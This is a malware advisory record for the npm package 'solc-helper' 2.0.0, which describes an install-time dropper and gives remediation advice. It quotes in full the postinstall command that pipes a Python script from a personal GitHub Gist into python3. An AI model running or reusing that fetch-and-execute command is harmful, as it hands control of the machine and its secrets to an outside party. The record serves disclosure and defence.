MAL-2026-3723

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71) The package.json defines a postinstall lifecycle hook that invokes child_process.exec to run `curl -s https://gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py | python3`, with a wget fallback to the same Gist. On `npm install`, the package downloads an attacker-controlled Python script from an anonymous personal GitHub Gist and pipes it directly to python3 with no version pinning, hash verification, or integrity check. The Gist is hosted by an individual account (`guellemilb`) unrelated to any established publisher, is mutable (the author can swap the payload at any time), and the fetched content is executed outside the Node ecosystem to evade Node-based scanners. The package's name suggests a Solidity compiler helper, which has no legitimate need to pull and run arbitrary Python from a personal Gist at install time. This is a canonical install-time remote-code-execution dropper.

## Source: ghsa-malware (4b7abc65278cd38e0651950e35992c13c8fb878026ecc2375b185027e5f9cbc0) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

## Source: ossf-package-analysis (403dac6f4c0356afdc379cd24298b168012c1724a7c165a256b0ea53c06b7560) The OpenSSF Package Analysis project identified 'npmjs_solc-helper' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

- The package executes one or more commands associated with malicious behavior.